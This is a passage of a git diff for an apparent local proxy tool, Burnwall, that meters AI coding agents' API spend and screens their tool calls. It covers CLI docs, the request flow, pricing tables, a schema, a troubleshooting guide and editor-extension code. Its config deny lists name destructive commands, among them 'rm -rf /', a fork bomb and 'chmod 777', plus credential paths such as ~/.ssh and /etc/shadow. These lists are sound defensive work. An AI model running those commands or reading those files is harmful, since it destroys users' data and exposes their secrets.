- [1] Track AI costs - [2] Set budget limits - [3] Security / access control - [4] All of the above -> (stored locally in ~/.burnwall/config.toml, never sent anywhere) -``` - -**Detection logic:** -- Claude Code: check if `claude` binary exists in PATH -- Codex CLI: check if `codex` binary exists in PATH -- Aider: check if `aider` binary exists in PATH -- OpenCode: check if `opencode` binary exists in PATH - -**Shell detection:** -- Check `$SHELL` env var -- Support: zsh (~/.zshrc), bash (~/.bashrc), fish (~/.config/fish/config.fish) -- On Windows: set system environment variables via PowerShell - -### `burnwall start` - -Start the proxy daemon. - -``` -$ burnwall start - -🛡️ Burnwall v0.1.0 - Proxy: http://localhost:4100 - Config: ~/.burnwall/config.toml - Database: ~/.burnwall/burnwall.db - - Routes: - /anthropic/* → api.anthropic.com - /openai/* → api.openai.com - - Security: 4 deny rules active - Budget: $50.00/day - - Ready. All API calls are being tracked. -``` - -**Behavior:** -- Starts HTTP server on `localhost:4100` (configurable via `--port`) -- Runs in foreground by default -- `--daemon` flag runs as background process, writes PID to `~/.burnwall/burnwall.pid` -- Exits gracefully on SIGINT/SIGTERM -- If port is already in use, print helpful error message - -### `burnwall stop` - -Stop the background proxy daemon. - -``` -$ burnwall stop -Stopped Burnwall (PID 12345). -``` - -### `burnwall status` - -Show current spend summary. 
- -``` -$ burnwall status - -📊 Today (May 11, 2026) - Total: $12.47 across 84 requests - - Provider / Model Cost Requests Cache Hit - ───────────────────────────────────────────────────────────────── - anthropic/claude-sonnet-4-6 $8.20 62 73% - anthropic/claude-haiku-4-5 $0.92 18 91% - openai/gpt-5.4 $3.35 4 45% - - 💰 Budget: $12.47 / $50.00 (24.9%) - 🛡️ Security: 2 blocked attempts - 🔄 Loops: 1 detected and killed - - Cache savings today: $47.82 - (without caching, today would have cost $60.29) -``` - -**Data source:** Query SQLite for today's records, grouped by provider+model. - -**Cache hit rate calculation:** -``` -cache_hit_rate = cache_read_tokens / (cache_read_tokens + input_tokens + cache_creation_tokens) -``` - -**Cache savings calculation:** -``` -savings = (cache_read_tokens × base_input_price) - (cache_read_tokens × cache_read_price) -``` - -### `burnwall history [--days N]` - -Show historical spend. Default: 7 days. - -``` -$ burnwall history - -📅 Last 7 days - Date Cost Requests Cache Blocked - ──────────────────────────────────────────────────── - May 11 $12.47 84 73% 2 - May 10 $28.91 156 68% 0 - May 9 $7.23 41 82% 1 - May 8 $45.02 203 45% 5 - May 7 $19.88 98 71% 0 - May 6 $31.44 167 62% 3 - May 5 $22.10 121 77% 1 - ──────────────────────────────────────────────────── - Total $167.05 870 avg 68% 12 - - Estimated monthly (at this rate): $715.93 -``` - -Flags: -- `--days N` — show N days (default 7) -- `--json` — output as JSON -- `--model` — break down by model per day - -### `burnwall metrics [--days N] [--json]` - -Per-model latency percentiles, error rate, and throughput — computed locally -from the request log. The local answer to hosted LLM observability. Metadata -only; never reads prompt content. Default window: 7 days. 
- -``` -$ burnwall metrics - -📈 Latency & reliability (last 7 days) - - Provider / Model Reqs Errs p50 p95 Err% Req/day - ────────────────────────────────────────────────────────────────────────────────── - anthropic/claude-sonnet-4-6 428 3 842ms 3180ms 0.7% 61.1 - openai/gpt-5.4 96 5 510ms 1920ms 5.2% 13.7 - google/gemini-2.5-pro 140 0 690ms 2450ms 0.0% 20.0 -``` - -**Data source:** per-request upstream latency (ms) and HTTP status recorded on -the response path. `p50`/`p95` are percentiles over latency samples in the -window; `Err%` is the share of requests with a 4xx/5xx status; `Req/day` is the -request count divided by the window in days. Empty window prints a hint to route -a request through the proxy first. - -Flags: -- `--days N` — window in days (default 7, floored at 1) -- `--json` — emit `{ "days", "models": [ { provider, model, requests, errors, - error_rate, p50_ms, p95_ms, throughput_per_day } ] }` - -### `burnwall digest [--days N] [--json]` - -An Agent Bill of Materials for a window: which models ran and what they cost, -which MCP servers/tools were touched, how many tool calls were made, which -security checks fired, and total turns. Assembled entirely from existing -metadata rows — never reads prompt content. Default window: 7 days. 
- -``` -$ burnwall digest - -🧾 Agent Bill of Materials (last 7 days) - - Turns: 664 requests (8 blocked) - Total cost: $241.07 - - Models: - anthropic/claude-sonnet-4-6 428 req $198.40 - openai/gpt-5.4 96 req $31.22 - google/gemini-2.5-pro 140 req $11.45 - - MCP tool calls: 52 (4 distinct tools) - MCP tools advertised: - filesystem/read_file (approved) - filesystem/write_file (pending) - - Security checks fired: 8 - path_blocked: 6 - secret_detected: 2 - Distinct targets touched: 5 -``` - -Flags: -- `--days N` — window in days (default 7) -- `--json` — emit the same structure as the table (days, turns, blocked, - total_cost_usd, models, mcp_tool_calls, distinct_mcp_tools, mcp_tools, - security_by_type, distinct_targets) - -### `burnwall report [--days N] [--format text|json|csv]` - -A shareable period summary (default window: 30 days): spend, request/blocked -activity, top models by cost, and security blocks by type. Built from the same -metadata as `digest`; never reads prompt content. `--format csv` emits the -per-model spend rows; `--format json` the full structure. - -### `burnwall audit ` - -Cryptographic audit receipts and compliance exports (all metadata only). - -- `burnwall audit seal` — walk the request + security-event logs and append, in - chronological order, a signed link in a hash chain for each not-yet-sealed - action. Each receipt stores a SHA-256 of the source row's canonical contents - (`content_hash`), chained as `hash = SHA-256(prev_hash ‖ content_hash)`, and - signed with a local Ed25519 key at `~/.burnwall/audit_ed25519.key` (generated - 0600 on first use). Idempotent — already-sealed rows are skipped. -- `burnwall audit verify` — re-walk the chain: check every hash link, re-derive - each `content_hash` from the live source row, and verify each Ed25519 - signature. Prints the public key. Exits non-zero if the chain is tampered - (a receipt or a sealed row was edited, deleted, or reordered). 
-- `burnwall audit export [--format json|csv]` — dump the receipt log. -- `burnwall audit aibom [--days N]` — export a CycloneDX 1.6 AI Bill of - Materials for the window (models as components, MCP servers as services). -- `burnwall audit sarif [--days N]` — export security blocks as SARIF 2.1.0 - for GitHub code scanning. - -``` -$ burnwall audit seal -🔏 Sealed 2 new receipts into the audit chain. - Public key: 85369a5c3c6f586823d45c9d182e1e177598dae37b0c7791f65c1aa7cb68bec7 - -$ burnwall audit verify -✅ Audit chain intact — 2 receipts verified. - Public key: 85369a5c3c6f586823d45c9d182e1e177598dae37b0c7791f65c1aa7cb68bec7 -``` - -### `burnwall rules` — signed remote packs (v0.9) - -In addition to bundled official packs and local third-party packs (TOFU), rule -packs can be fetched from a URL when signed by a trusted publisher: - -- `burnwall rules keygen ` — generate an Ed25519 publisher keypair - (writes the secret seed `0600`; prints the public key to share). -- `burnwall rules sign --key [--out ]` — produce a - detached hex signature over the pack. -- `burnwall rules verify --sig [--publisher ]` — verify a - pack's signature against `[rules].publishers` (and any `--publisher` keys). -- `burnwall rules fetch [--sig ] [--publisher ] [--yes]` — - download a pack + its signature, verify against trusted publishers, and - install it. **A remote pack is installed only if its signature verifies**, and - it is still parsed under the deny-only / append-only invariants — it can only - add restrictions, never loosen them. Trusted publisher keys live under - `[rules]` as `publishers = [{ name = "...", key = "" }]`. - -### Editor extension (VS Code / Cursor / Windsurf / VSCodium) - -`editor/vscode/` is a separate TypeScript extension that shows today's spend, -cache hit rate, and blocked-request count in the status bar by shelling out to -`burnwall status --json`. It reads only the local CLI output — no network, no -direct database access. See `editor/vscode/README.md`. 
- -### `burnwall config set ` - -Set configuration values. - -``` -$ burnwall config set budget.daily 20 -✅ Daily budget set to $20.00 - -$ burnwall config set security.deny_paths "~/.ssh,~/.aws,~/.gnupg" -✅ Deny paths updated (3 entries) - -$ burnwall config set security.deny_commands "rm -rf,chmod 777" -✅ Deny commands updated (2 entries) -``` - -### `burnwall config show` - -Show current configuration. - -``` -$ burnwall config show - -[proxy] -port = 4100 -host = "127.0.0.1" - -[budget] -daily = 50.0 -warn_percent = 80 - -[security] -deny_paths = ["~/.ssh", "~/.aws", "~/.gnupg", "~/.kube"] -deny_commands = ["rm -rf /", "chmod 777"] -detect_secrets = true -block_network_mounts = true - -[loop_detection] -enabled = true -max_identical_requests = 5 -window_seconds = 300 -max_cost_per_window = 2.0 -``` - ---- - -## Proxy Behavior - -### Request Flow (detailed) - -``` -1. RECEIVE request from AI tool on localhost:4100 -2. IDENTIFY provider from URL path: - /anthropic/* → Anthropic Messages API - /openai/* → OpenAI Chat Completions API - /google/* → Google Gemini API (generateContent) -3. SECURITY CHECK (request body): - a. Parse JSON body - b. Scan for tool_use / function_call blocks - c. For each tool call: - - Check file paths against deny_paths list - - Check commands against deny_commands list - - Check for network mount paths (/Volumes/, \\, smb://, nfs://) - - Check for secret patterns (AWS keys, API tokens, private keys) - d. If ANY rule matches: - - Return HTTP 403 with JSON error body: - {"error": {"type": "security_blocked", "message": "Burnwall blocked: attempted read of ~/.ssh/id_rsa"}} - - Log blocked event to SQLite - - Print warning to terminal: 🛡️ BLOCKED: ... - - Do NOT forward the request -4. BUDGET CHECK: - a. Query today's total spend from SQLite - b. 
If >= daily_limit: - - Return HTTP 429 with JSON error body: - {"error": {"type": "budget_exceeded", "message": "Daily budget of $20.00 exceeded ($20.47 spent)"}} - - Log event - - Print warning: 💰 BUDGET EXCEEDED: ... - c. If >= warn_percent of daily_limit: - - Print warning: ⚠️ Budget 85% used ($17.02/$20.00) - - Still forward the request -5. FORWARD request to real provider: - a. Rewrite URL: strip /anthropic, /openai, or /google prefix - b. Forward all headers unchanged (including auth) - c. Forward body unchanged - d. For streaming (SSE) responses: pipe through, parse final usage chunk - e. For non-streaming: buffer response, parse usage - f. [v0.7] If `[resilience]` is enabled and the upstream is unreachable or - returns 5xx, retry the SAME request against the next configured endpoint - for that provider (skipping endpoints whose circuit breaker is open). - The request shape is identical — a transparent reroute, not a translation. -6. PARSE response usage block: - a. Extract token counts by type (input, cached, output, cache_write) - b. Look up model in pricing database - c. Calculate real cost with cache-aware pricing -7. LOOP DETECTION [v0.2]: - a. Hash first 200 chars of request content - b. Check if same hash appeared N+ times in last M seconds - c. If loop detected: block with 429, exponential backoff -8. STORE in SQLite: - - timestamp, provider, model, input_tokens, cache_creation_tokens, - cache_read_tokens, output_tokens, cost_usd, blocked (bool), - block_reason, session_id (from request header if available) - - [v0.7] upstream latency (ms) and HTTP status — metadata only, feeds - `burnwall metrics`. If `[observability].otel_spans` is on, also emit one - OpenTelemetry GenAI span (`gen_ai.*`) as a line of JSON to `otel_file`. -9. RETURN response unchanged to AI tool -``` - -### Streaming (SSE) Handling - -Many AI tools use streaming responses (`stream: true`). The proxy must: -1. Forward SSE chunks as they arrive (don't buffer the whole response) -2. 
Parse the FINAL chunk which contains the usage block -3. Calculate cost from the final usage block -4. Log to SQLite after the stream completes - -For Anthropic streaming, the usage is in the `message_delta` event with `stop_reason`. -For OpenAI streaming, usage is in the final chunk when `stream_options.include_usage` is set, or must be estimated from token counting. - -### Error Handling - -- If request body is not valid JSON → forward anyway (might be a non-chat endpoint) -- If response parsing fails → log error, still return response unchanged -- If SQLite write fails → log error, don't crash, keep proxying -- If upstream provider is unreachable → return 502 with helpful message - (with `[resilience]` enabled, only after every configured endpoint for that - provider has failed or has an open circuit) -- If upstream returns error → forward error unchanged, still log the attempt - ---- - -## Pricing Database - -### Anthropic Models (as of May 2026) - -| Model | Input ($/MTok) | Cache Write ($/MTok) | Cache Read ($/MTok) | Output ($/MTok) | -|-------|---------------|---------------------|--------------------|-----------------| -| claude-opus-4-7 | 5.00 | 6.25 (1.25x) | 0.50 (0.10x) | 25.00 | -| claude-opus-4-6 | 5.00 | 6.25 (1.25x) | 0.50 (0.10x) | 25.00 | -| claude-sonnet-4-6 | 3.00 | 3.75 (1.25x) | 0.30 (0.10x) | 15.00 | -| claude-haiku-4-5 | 1.00 | 1.25 (1.25x) | 0.10 (0.10x) | 5.00 | - -Note: 1-hour cache duration is 2x base input (instead of 1.25x). Detect from cache_control in request. - -### OpenAI Models (as of May 2026) - -| Model | Input ($/MTok) | Cached Input ($/MTok) | Output ($/MTok) | -|-------|---------------|-----------------------|-----------------| -| gpt-5.5 | 2.00 | 1.00 (0.50x) | 10.00 | -| gpt-5.4 | 1.25 | 0.625 (0.50x) | 10.00 | -| gpt-5.4-mini | 0.15 | 0.075 (0.50x) | 0.60 | - -Note: OpenAI caching is automatic (50% discount on cached tokens). No write premium. 
- -### Google Gemini Models (as of May 2026) - -| Model | Input ($/MTok) | Cached Input ($/MTok) | Output ($/MTok) | -|-------|---------------|-----------------------|-----------------| -| gemini-2.5-pro | 1.25 | 0.3125 (0.25x) | 10.00 | -| gemini-2.5-flash | 0.30 | 0.075 (0.25x) | 2.50 | -| gemini-2.0-flash | 0.10 | 0.025 (0.25x) | 0.40 | - -Note: Gemini caching is implicit — there is no cache-write cost on the response -path. Token accounting comes from `usageMetadata` (the cached-content split is -read from `cachedContentTokenCount`; thinking tokens fold into output). - -### Pricing Update Strategy - -Prices are embedded in the binary as a TOML file. Users can override with a local -`~/.burnwall/pricing.toml` file. We publish pricing updates as new releases. -The `burnwall status` command shows a warning if pricing data is >30 days old. - -### Pricing Notes - -- **OpenAI caching is automatic** (no opt-in). Cached tokens are 50% of the base input price (not 90% like Anthropic). -- **Anthropic has two cache durations:** 5-min (1.25× write) and 1-hour (2× write). Reads are 0.1× base for both. -- **Cache multipliers stack with Batch API discounts** — apply Batch discount on top of cached-token rate. -- **Opus 4.7 shipped a new tokenizer** that produces up to 35% more tokens for the same text. Same per-token price, but higher effective cost — a stealth price increase versus Opus 4.6. -- **Warning:** `pricing.toml` should be checked monthly. The CLI must show a warning if pricing data is >30 days old (see Pricing Update Strategy above). - ---- - -## SQLite Schema - -```sql -CREATE TABLE IF NOT EXISTS requests ( - id INTEGER PRIMARY KEY AUTOINCREMENT, - timestamp TEXT NOT NULL DEFAULT (datetime('now')), - provider TEXT NOT NULL, -- 'anthropic', 'openai', 'google' - model TEXT NOT NULL, -- 'claude-sonnet-4-6', 'gpt-5.4', etc. 
- input_tokens INTEGER NOT NULL DEFAULT 0, - cache_creation_tokens INTEGER NOT NULL DEFAULT 0, - cache_read_tokens INTEGER NOT NULL DEFAULT 0, - output_tokens INTEGER NOT NULL DEFAULT 0, - cost_usd REAL NOT NULL DEFAULT 0.0, - blocked INTEGER NOT NULL DEFAULT 0, -- boolean: 0 or 1 - block_reason TEXT, -- null if not blocked - session_id TEXT, -- from request headers if available - request_hash TEXT -- [v0.2] for loop detection -); - -CREATE INDEX IF NOT EXISTS idx_requests_timestamp ON requests(timestamp); -CREATE INDEX IF NOT EXISTS idx_requests_provider_model ON requests(provider, model); -CREATE INDEX IF NOT EXISTS idx_requests_blocked ON requests(blocked); - -CREATE TABLE IF NOT EXISTS security_events ( - id INTEGER PRIMARY KEY AUTOINCREMENT, - timestamp TEXT NOT NULL DEFAULT (datetime('now')), - event_type TEXT NOT NULL, -- 'path_blocked', 'command_blocked', 'secret_detected', 'mount_blocked' - details TEXT NOT NULL, -- what was blocked (path, command, etc.) - provider TEXT, - model TEXT -); - -CREATE TABLE IF NOT EXISTS daily_summary ( - date TEXT PRIMARY KEY, -- 'YYYY-MM-DD' - total_cost REAL NOT NULL DEFAULT 0.0, - total_requests INTEGER NOT NULL DEFAULT 0, - total_blocked INTEGER NOT NULL DEFAULT 0, - cache_savings REAL NOT NULL DEFAULT 0.0, - updated_at TEXT NOT NULL DEFAULT (datetime('now')) -); -``` - ---- - -## Config File Format - -Location: `~/.burnwall/config.toml` - -```toml -[proxy] -port = 4100 -host = "127.0.0.1" - -[budget] -daily = 50.0 # dollars -monthly = 0.0 # 0 = no monthly limit -warn_percent = 80 # warn at this % of daily limit - -[security] -enabled = true -deny_paths = [ - "~/.ssh", - "~/.aws", - "~/.gnupg", - "~/.kube", - "~/.config/gcloud", - "/etc/passwd", - "/etc/shadow", -] -deny_commands = [ - "rm -rf /", - "rm -rf ~", - "chmod 777", - ":(){ :|:& };:", -] -block_network_mounts = true # block /Volumes/*, \\server\share, smb://, nfs:// -detect_secrets = true # scan for API keys, private keys in outbound payloads -dlp = false # 
opt-in egress check: Luhn-valid card numbers, US SSNs - -[loop_detection] -enabled = true -max_identical_requests = 5 # same hash N times in window → block -window_seconds = 300 # 5 minute window -max_cost_per_window = 2.0 # $2 in 5 min → flag as loop - -[logging] -level = "info" # trace, debug, info, warn, error -file = "~/.burnwall/burnwall.log" - -[mcp] -require_approval = false # enforce: block tools/call to unapproved tools - -# One watcher can front several MCP servers, routed by the first path -# segment (`//...` → that server's upstream, prefix stripped). -[[mcp.servers]] -name = "filesystem" -upstream = "http://localhost:8090" - -[resilience] -enabled = false # off by default: single upstream, verbatim 5xx -failure_threshold = 3 # consecutive failures before a circuit opens -cooldown_seconds = 30 # how long an open circuit stays open before a probe - -# Per-provider ordered fallback endpoints. The primary upstream is tried first; -# these are tried after it, in order, on a connection error or 5xx. -[[resilience.endpoints]] -provider = "anthropic" # 'anthropic' | 'openai' | 'google' -urls = ["https://bedrock.example.com"] - -[observability] -otel_spans = false # emit one OTel GenAI span per request (file-only) -otel_file = "" # span file; empty → /otel-spans.jsonl -``` - -`burnwall mcp` manages the MCP tool-approval workflow and audit log: - -- `burnwall mcp list [--json]` — every `(server, tool)` seen, with its approval - state (`pending` / `approved`). -- `burnwall mcp approve [tool]` — approve one tool, or every tool of a - server. In enforce mode a `tools/call` to a tool that is not approved is held - with a 403 until you approve it; a tool whose definition later changes is - reset to `pending` automatically. -- `burnwall mcp revoke [tool]` — return a tool (or a server) to - `pending`. -- `burnwall mcp export [--days N] [--format json|csv]` — portable record of MCP - tool-call activity and MCP-side security events. 
- ---- - -## v0.2 Additions (Week 3-4) - -- Loop detection (request content hashing, exponential backoff) -- `burnwall security` command to view blocked attempts -- Security profile YAML files per project: - ```yaml - # .burnwall.yaml in project root - allow_paths: - - ./src - - ./tests - deny_paths: - - ./secrets - - ./.env - budget: - daily_max_usd: 10 - ``` - - diff --git a/docs/TROUBLESHOOTING.md b/docs/TROUBLESHOOTING.md new file mode 100644 index 0000000..b47f0f1 --- /dev/null +++ b/docs/TROUBLESHOOTING.md @@ -0,0 +1,101 @@ +# Troubleshooting + +Burnwall is local-only and stores zero telemetry, so it can't phone home and we +can't see your machine. Instead, every problem has a command that explains +itself. Start here: + +```bash +burnwall doctor # one-glance health check + the fix for what's wrong +``` + +If you're about to file a bug, attach a redacted, metadata-only bundle (it's +self-scanned for secrets before it's written, and nothing is sent anywhere): + +```bash +burnwall doctor --export +``` + +--- + +## Symptom → fix + +| Symptom | What it means | Do this | +|---|---|---| +| Requests fail with **connection refused** | Your tool is routed at the proxy, but the proxy isn't answering on that port | `burnwall recover` to get unstuck now, then `burnwall start`. Open a **new shell** so it re-routes. 
| +| Status line says **`DIRECT (unprotected)`** | This shell isn't routed through Burnwall — traffic is going straight to the provider with no scanning or cost capture | `burnwall doctor` — it tells you whether that's a misconfiguration or your own choice, and the exact fix | +| Status line says **`DIRECT (unprotected) — run burnwall doctor`** | Routing **is** configured, but this shell fell through to direct (the proxy was down when the shell launched, or the shell predates routing) | `burnwall doctor --fix` (starts the proxy if it's down), then open a **new shell** | +| Status line says **`PROXY DOWN`** | This shell is routed, but the proxy process died | `burnwall start`, then check `burnwall status` | +| Status line says **`PAUSED (unprotected)`** | You ran `burnwall pause` — everything relays unchecked until the window ends | `burnwall resume` to restore protection now (it also auto-expires) | +| A request was **unexpectedly blocked** (403 / an `x-burnwall-blocked` header) | A security rule matched the tool call before it left your machine | `burnwall security --days 7` to find the event id, then `burnwall explain <id>`. If it's a false positive: `burnwall allow-once`. See [RULES.md](RULES.md). | +| **Numbers look wrong**, or you want your data elsewhere | — | `burnwall export --format csv` (or `json`) — your rows, on your machine | +| Status line **tokens/context don't move** while your agent runs sub-agents | Expected — see ["Tokens freeze during sub-agents"](#tokens-freeze-during-sub-agents) below | Nothing to fix; the plan/cost segments still track the real traffic | +| **Pricing looks stale** | The bundled rate card is old | Upgrade Burnwall (`burnwall upgrade`); `burnwall doctor` warns when pricing is >30 days old | + +--- + +## "Running, but unprotected" + +The most confusing state is a configured-but-unprotected one: you set up +routing, yet a shell is going direct. 
There are two causes, and Burnwall tells +them apart so it only nags when it's actually a problem: + +- **Unintended** — routing is enabled, but the proxy was down when this shell + started (so the env didn't route), or the shell predates routing. + `burnwall doctor` reports this as `⚠ UNPROTECTED`, and `burnwall doctor --fix` + starts the proxy when that's the issue. +- **By choice** — you ran `burnwall disable-routing`, or never set routing up. + `burnwall doctor` reports this as a `•` note, **not** a warning, and `--fix` + will not override it — it just tells you the command to turn protection back + on (`burnwall enable-routing`). + +One thing no command can do for you: environment variables are fixed when a +shell launches, so a shell that started unprotected stays unprotected until you +open a **new** one (or restart your AI tool). `burnwall doctor` says so rather +than pretend otherwise. + +--- + +## Tokens freeze during sub-agents + +When your AI tool spins up sub-agents, the status line's token counters (`↑ ↓`) +and context gauge (`ctx`) stop moving until the sub-agents finish. That's +correct, not a bug: + +- Those two segments come from **the tool's own report of your main + conversation** — and your conversation genuinely isn't growing while a + sub-agent works in its own, separate context window. The `ctx` gauge answers + "how full is *my* conversation" (the number you act on when deciding to + compact), so it must not count sub-agent context. +- The traffic is still fully metered and scanned: every sub-agent API call goes + through the proxy, so the **plan headroom (`5h`/`7d`), spend, and block + count keep moving** — that's your live signal that work is happening. +- Surfaces fed from the database rather than the tool (`burnwall watch`, the + editor status bar) don't freeze at all. 
+ +--- + +## Where your data lives + +Everything is local, in a single directory under your home: + +``` +~/.burnwall/ + burnwall.db # all metadata: cost, tokens, security events (one SQLite file) + config.toml # your settings +``` + +- **Back up** by copying `burnwall.db` — that one file is your whole history. +- **Export** a portable copy with `burnwall export --format csv|json`. +- The database holds **metadata only** — model, tokens, cost, timestamps, and + redacted security-event matches. No prompt content, no API keys. + +--- + +## Filing a bug + +1. Reproduce the problem. +2. Run `burnwall doctor --export`. It writes a redacted, metadata-only bundle and + self-scans it for secrets before writing — if anything secret-shaped survived, + it refuses to write rather than risk a leak. +3. Review the file (it's plain text), then attach it to a new issue. The bug + report template asks for it up front. diff --git a/editor/vscode/package.json b/editor/vscode/package.json index 5f5437d..c137b9c 100644 --- a/editor/vscode/package.json +++ b/editor/vscode/package.json @@ -2,7 +2,7 @@ "name": "burnwall", "displayName": "Burnwall", "description": "Cost + security for your AI coding agents, at a glance — reads your local Burnwall CLI.", - "version": "0.9.2", + "version": "0.11.0", "publisher": "intbot", "license": "FSL-1.1-MIT", "repository": { "type": "git", "url": "https://github.com/intbot/burnwall" }, diff --git a/editor/vscode/src/format.ts b/editor/vscode/src/format.ts index b4b8ad4..57971c4 100644 --- a/editor/vscode/src/format.ts +++ b/editor/vscode/src/format.ts @@ -6,6 +6,8 @@ export interface StatusJson { total_cost_usd?: number; combined_total_usd?: number; + proxy_running?: boolean; + env_routing?: string; blocked_requests?: number; security_events?: number; budget?: { daily_limit_usd?: number; spent_today_usd?: number }; @@ -14,6 +16,40 @@ export interface StatusJson { cache_creation_tokens?: number; cache_read_tokens?: number; }>; + plan?: { + providers?: 
Array<{ + provider: string; + status: string; + windows: Array<{ label: string; utilization: number; reset_in_secs: number }>; + }>; + } | null; + coverage?: Array<{ + tool: string; + binary: string; + state: "protected" | "installed_not_seen" | "bypasses"; + seen_secs_ago?: number; + reason?: string; + }>; +} + +/** Coverage verdict for one installed tool. */ +export interface CoverageItem { + tool: string; + state: "protected" | "installed_not_seen" | "bypasses"; + seenSecsAgo: number | null; + reason: string | null; +} + +/** Subscription-plan limit headroom for one provider's binding window. */ +export interface PlanSummary { + provider: string; + primaryLabel: string; + /** 0..100. */ + primaryPct: number; + primaryResetInSecs: number; + secondaryLabel: string | null; + secondaryPct: number | null; + throttled: boolean; } export interface StatusSummary { @@ -24,10 +60,65 @@ export interface StatusSummary { securityEvents: number; /** Percent of the daily budget spent, or null when no daily limit is set. */ budgetPercent: number | null; + /** Subscription headroom (tightest binding window), or null for API usage. */ + plan: PlanSummary | null; + /** Per-tool coverage; empty when no supported tools are installed. */ + coverage: CoverageItem[]; + /** True when the env routes to the proxy but the proxy process is not + * running — every request from that environment will fail (U-C1). */ + proxyDown: boolean; +} + +/** "time until" label for a reset countdown: `45m`, `2h28m`, `2d7h`, `now`. */ +export function humanDuration(secs: number): string { + if (secs <= 0) { + return "now"; + } + const mins = Math.floor(secs / 60); + if (mins < 60) { + return `${mins}m`; + } + const hours = Math.floor(mins / 60); + if (hours < 24) { + return `${hours}h${String(mins % 60).padStart(2, "0")}m`; + } + return `${Math.floor(hours / 24)}d${hours % 24}h`; +} + +/** Pick the tightest binding window across all subscription providers. 
*/ +function planSummary(s: StatusJson): PlanSummary | null { + const providers = s.plan?.providers ?? []; + let best: PlanSummary | null = null; + for (const prov of providers) { + const windows = prov.windows ?? []; + if (windows.length === 0) { + continue; + } + const primary = windows[0]; + const secondary = windows[1] ?? null; + const cand: PlanSummary = { + provider: prov.provider, + primaryLabel: primary.label, + primaryPct: primary.utilization * 100, + primaryResetInSecs: primary.reset_in_secs, + secondaryLabel: secondary ? secondary.label : null, + secondaryPct: secondary ? secondary.utilization * 100 : null, + // Only positively-throttling statuses — Anthropic emits warning-grade + // intermediates (`allowed_warning`) while requests still succeed (U-H4). + throttled: ["throttled", "rejected", "blocked", "rate_limited"].includes(prov.status), + }; + if (!best || cand.primaryPct > best.primaryPct) { + best = cand; + } + } + return best; } export function summarize(s: StatusJson): StatusSummary { - const costToday = s.combined_total_usd ?? s.total_cost_usd ?? 0; + // Headline figure: the proxied total. `combined_total_usd` is now deduped + // server-side (X4), but proxied spend is the number Burnwall can vouch for; + // the combined figure is detail for the panel, not the bar. + const costToday = s.total_cost_usd ?? s.combined_total_usd ?? 0; let cacheRead = 0; let promptTotal = 0; @@ -44,17 +135,56 @@ export function summarize(s: StatusJson): StatusSummary { const spent = s.budget?.spent_today_usd ?? costToday; const budgetPercent = limit > 0 ? (spent / limit) * 100 : null; + const coverage: CoverageItem[] = (s.coverage ?? []).map((c) => ({ + tool: c.tool, + state: c.state, + seenSecsAgo: c.seen_secs_ago ?? null, + reason: c.reason ?? null, + })); + return { costToday, cacheHitRate, blocked: s.blocked_requests ?? 0, securityEvents: s.security_events ?? 
0, budgetPercent, + plan: planSummary(s), + coverage, + proxyDown: s.env_routing === "proxied" && s.proxy_running === false, }; } -/** One-line status-bar label (VS Code `$(icon)` codicons allowed). */ +/** One-line status-bar label (VS Code `$(icon)` codicons allowed). On a + * subscription, dollars are notional, so the binding limit window leads instead. */ export function statusBarText(s: StatusSummary): string { + // Routed at a dead proxy beats every other message: the user's tools are + // actively failing with connection-refused right now (U-C1). + if (s.proxyDown) { + return "$(error) Burnwall proxy DOWN — run `burnwall start`"; + } + const bypassed = s.coverage.filter((c) => c.state === "bypasses"); + const bypassPart = + bypassed.length > 0 + ? `$(warning) ${bypassed.map((c) => c.tool).join(", ")} unprotected` + : null; + if (s.plan) { + const p = s.plan; + const parts = [ + `$(flame) ${p.primaryLabel} ${Math.round(p.primaryPct)}% (${humanDuration( + p.primaryResetInSecs, + )})`, + ]; + if (p.throttled) { + parts.push("$(warning) throttled"); + } + if (s.blocked > 0) { + parts.push(`$(shield) ${s.blocked}`); + } + if (bypassPart) { + parts.push(bypassPart); + } + return parts.join(" · "); + } const parts = [`$(flame) $${s.costToday.toFixed(2)}`]; if (s.cacheHitRate !== null) { parts.push(`cache ${Math.round(s.cacheHitRate * 100)}%`); @@ -62,9 +192,26 @@ export function statusBarText(s: StatusSummary): string { if (s.blocked > 0) { parts.push(`$(shield) ${s.blocked}`); } + if (bypassPart) { + parts.push(bypassPart); + } return parts.join(" · "); } +/** Human-readable coverage line for the tooltip. */ +function coverageLine(c: CoverageItem): string { + switch (c.state) { + case "protected": + return ` ${c.tool}: protected${ + c.seenSecsAgo !== null ? ` (seen ${humanDuration(c.seenSecsAgo)} ago)` : "" + }`; + case "bypasses": + return ` ${c.tool}: NOT protected${c.reason ? 
` — ${c.reason}` : ""}`; + default: + return ` ${c.tool}: installed, no traffic seen`; + } +} + export function tooltip(s: StatusSummary): string { const budgetLine = s.budgetPercent !== null @@ -74,14 +221,41 @@ export function tooltip(s: StatusSummary): string { s.cacheHitRate !== null ? `Cache hit rate: ${Math.round(s.cacheHitRate * 100)}%` : `Cache hit rate: n/a`; - return [ + // On a flat-rate plan the dollar figure is notional (API-equivalent), not a + // bill — label it so a subscriber doesn't read it as money owed. + const costLine = s.plan + ? `Cost: $${s.costToday.toFixed(2)} (notional — flat-rate plan)` + : `Cost: $${s.costToday.toFixed(2)}`; + const lines = [ "Burnwall — today", - `Cost: $${s.costToday.toFixed(2)}`, + costLine, budgetLine, cacheLine, `Blocked requests: ${s.blocked}`, `Security events: ${s.securityEvents}`, - "", - "Click for the full breakdown.", - ].join("\n"); + ]; + if (s.proxyDown) { + lines.splice(1, 0, "⛔ PROXY DOWN — tools routed here will fail to connect. Run `burnwall start`."); + } + if (s.plan) { + const p = s.plan; + lines.push( + "", + `Plan (${p.provider})${p.throttled ? " — THROTTLED" : ""}`, + `${p.primaryLabel}: ${Math.round(p.primaryPct)}% used, resets ${humanDuration( + p.primaryResetInSecs, + )}`, + ); + if (p.secondaryLabel !== null && p.secondaryPct !== null) { + lines.push(`${p.secondaryLabel}: ${Math.round(p.secondaryPct)}% used`); + } + } + if (s.coverage.length > 0) { + lines.push("", "Coverage (routes through Burnwall):"); + for (const c of s.coverage) { + lines.push(coverageLine(c)); + } + } + lines.push("", "Click for the full breakdown."); + return lines.join("\n"); } diff --git a/editor/vscode/src/panel_view.ts b/editor/vscode/src/panel_view.ts index d744847..9ed855c 100644 --- a/editor/vscode/src/panel_view.ts +++ b/editor/vscode/src/panel_view.ts @@ -1,6 +1,14 @@ // Pure view model for the Burnwall panel — no `vscode` import, so it is // unit-testable under plain Node (see test/panel.test.ts). 
